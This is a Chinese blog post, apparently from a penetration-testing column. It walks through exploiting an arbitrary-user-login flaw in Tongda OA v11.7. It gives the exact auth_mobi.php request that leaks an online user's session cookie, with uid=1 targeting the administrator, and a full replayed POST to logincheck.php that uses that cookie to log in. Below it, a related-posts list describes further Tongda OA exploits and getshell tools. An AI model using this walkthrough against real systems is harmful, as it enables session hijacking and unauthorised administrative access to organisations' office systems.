通达OA11.7 漏洞 任意用户登录

最新推荐文章于 2024-05-17 08:10:09 发布
最新推荐文章于 2024-05-17 08:10:09 发布
阅读量1k 收藏 1
点赞数 1
分类专栏: 渗透 文章标签: 安全
不允许转载
本文链接:https://blog.csdn.net/weixin_46081055/article/details/119185774
版权

1.获取在线用户的cookie

IP/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0

uid=1为管理员,也可以通过爆破获取其他用户cookie
访问该路径,如果显示relogin则该用户没有登录,没有回显可以得到cookie

2.修改cookie登录

抓包找到校验的地方(下包为logincheck.php),修改为得到的cookie

POST /logincheck.php HTTP/1.1
Host: *****
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
Origin: http://*****
Connection: close
Referer: http://****/
Cookie: PHPSESSID=54j109u6gkc1iambtdao6428v6; KEY_RANDOMDATA=18340
Upgrade-Insecure-Requests: 1

UNAME=admin&PASSWORD=YWRtaW4%3D&encode_type=1
shu天
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
漏洞复现-通达TongdaOA系列
aming小老弟
10-03 4209
通达OA 网络智能办公系统 是由北京通达信科科技有限公司开发的一款办公系统采用基于WEB的企业计算,主HTTP服务器采用了世界上最先进的Apache服务器,性能稳定可靠。数据存取集中控制,避免了数据泄漏的可能。提供数据备份工具,保护系统数据安全。多级的权限控制,完善的密码验证与登录验证机制更加强了系统安全性。自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台2015年,通达OA入驻阿里云企业应用专区,为众多中小企业提供稳定、可靠的云计算支撑。
通达OA——前台任意用户伪造登录
xunhuanmao的博客
10-08 4191
通达OA是一套使用比较广泛的办公系统,文中所涉及到的利用方式仅供学习使用,切勿用于违法行为。
通达OA v11.7 auth_mobi.php 在线用户登录漏洞复现
花开烟雨楼的博客
03-22 2385
通达OA,Office Anywhere的首字母,是通达信科旗下的品牌。通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统通达OA,Office Anywhere的首字母,是通达信科旗下的品牌。通达OA v11.7 中存在某接口查询在线用户,当用户在线时会返回 PHPSESSION使其可登录后台系统。
通达OA v11.7 在线用户登录漏洞复现(附带一键getshell脚本)
最新发布
Innocence_0的博客
05-17 769
在文章的顶部先说明,本文章所介绍的内容以及所附带的脚本仅供学习,如果存在有牟利行为,个人负责!!!仅用于学习娱乐,切勿用于非法用途!请于下载后24小时内删除,使用者承担所有法律责任!一个类似于越权的漏洞,但是利用的方式确实比较特殊。
通达OA v11.7 在线用户登录漏洞附自写poc
yiiiing的博客
03-05 4246
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录一、漏洞描述二、漏洞影响三、漏洞复现四、漏洞利用POC五、总结 本文就介绍了通达OA v11.7 在线用户登录漏洞利用方法,及自己写得poc。 提示:以下是本篇文章正文内容,下面案例可供参考 一、漏洞描述 通达OA v11.7 中webroot\mobile\auth_mobi.php接口存在漏洞,无验证即可查询某个用户是否在线并返回PHPSESSION值使其可登录后台系统。 二、漏洞影响 通达OA < v11.7 三、漏
通达OA漏洞复现
weixin_44831109的博客
03-30 1670
1.靶场http://172.168.20.38/ 2.使用http://xx.xx.xx.xx/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 即http://172.168.20.38/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0 发现显示relogin证明网站前没有人在线,需要等待有人登录的时候在尝试 如果页面啥也没显示着则使用http://xx.xx.xx.xx/general
通达OA前台任意用户登录漏洞.md
09-07
通达OA漏洞合集
通达 OA 任意用户登录.md
04-12
通达 OA 任意用户登录
通达OA header身份认证绕过漏洞利用工具
12-25
通达OA header身份认证绕过漏洞利用脚本,可以检测漏洞是否存在并生成可用的cookie
通达OA v2017 video_file.php 任意文件下载漏洞.md
09-07
通达OA漏洞合集
通达OA综合利用工具通达OA综合利用工具
03-29
# 工具说明 **通达OA综合利用工具_20200224** ## 集成POC如下 ...若本地文件包含漏洞利用失败, 其次利用任意用户登录漏洞与SQL注入漏洞 这两个漏洞的利用方式集成在了"获取Cookie"按钮上<br /
通达OA_header_inc任意用户登录
Bnessy
10-29 230
【代码】通达OA_header_inc任意用户登录
通达OA 任意用户登录简单复现
一位热爱网安的年轻人的博客
05-12 1406
简介说明: 通达OA是一款企业办公的OA软件,开发公司为通达信科, 该公司于2020年4月17日更新了一款安全补丁,修复了任意用户登录漏洞 攻击者可以通过伪造信息来实现任意用户登录,这篇文章来对其进行复现。 #受到影响的版本 通达2017 通达V11.X<V11.5 简单的复现下 本次复现是在虚拟机内完成的 01:下载漏洞版本 复制粘贴到虚拟机 一键安装即可。 打开poc脚本 命令:python poc.py -v OA的版本 -url 网址/ip地址 输入命令 回车 然后复制脚本里的PHPSESS
通达OA任意用户登录复现(手工利用&脚本利用)
weixin_45852180的博客
03-14 4981
一、漏洞说明: 通达OA是一套办公系统。通达OA官方于4月17日发布安全更新。经分析,在该次安全更新中修复了包括任意用户登录在内的高危漏洞。 攻击者通过构造恶意请求,可以直接绕过登录验证逻辑,伪装为系统管理员身份登录OA系统。 二、版本影响: ·通达 OA 2017 版 ·通达 OA V11.X < V11.5 三、漏洞复现: 1.环境搭建 1)下载通达OA V11.4: https://cdndown.tongda2000.com/oa/2019/TDOA11.4.exe 2)运行,安装,访问htt
通达OA前台任意用户登录漏洞复现
m0_64769218的博客
09-17 599
通达OA是一套国内常用的办公系统,在V11.X
通达OA 11.5 SQL注入漏洞复现
Azjj
10-06 1088
0x00 漏洞描述 通达OA 11.5存在sql注入 0x01 漏洞影响版本 通达oa 11.5 0x02 漏洞复现 1、下载通达OA 11.5 https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe,点击安装 2、创建一个普通账户test:test123456 3.1、id参数存在sql注入 利用条件:一枚普通账号登录权限,但测试发现,某些低版本也无需登录也可注入 参数位置: /general/appbuilder/web/re..
通达OA 任意用户登录漏洞复现
box
09-16 2392
0x00 漏洞描述 该漏洞类型为任意用户伪造,未经授权的远程攻击者可以通过精心构造的请求包进行任意用户伪造登录。 0x01 影响版本 通达OA < 11.5.200417 版本 通达OA 2017版本 0x02 环境搭建 下载地址:https://cdndown.tongda2000.com/oa/2019/TDOA11.4.exe 直接安装就好了。。。 0x03 漏洞复现 POC:https://github.com/NS-Sp4ce/TongDaOA-Fake-User 用法 usage: PO
通达OA任意用户登录漏洞手工复现
桜的博客
04-23 2603
前言 已经有人发poc了,这里就找个网站手工复现一下 影响范围 小于11.5版本、2017版本 开始 首先fofa找到一个目标网站 2017的版的 直接点登录抓包,放到repeater中 然后修改三个地方 更改url/logincheck_code.php、添加UID=1、删除PHPSESSID的值,如果不删除是不会返回一个PHPSESSID的 然后随便抓一个登录处的包,修改url,替换s...
通达oa任意用户登录
09-05
对于通达OA任意用户登录,我可以提供以下回答。 通达OA允许任意用户登录,这意味着所有拥有有效账号和密码的用户都可以登录系统并访问其功能。用户可以通过在登录界面输入正确的用户名和密码,然后点击登录按钮来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

shu天

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值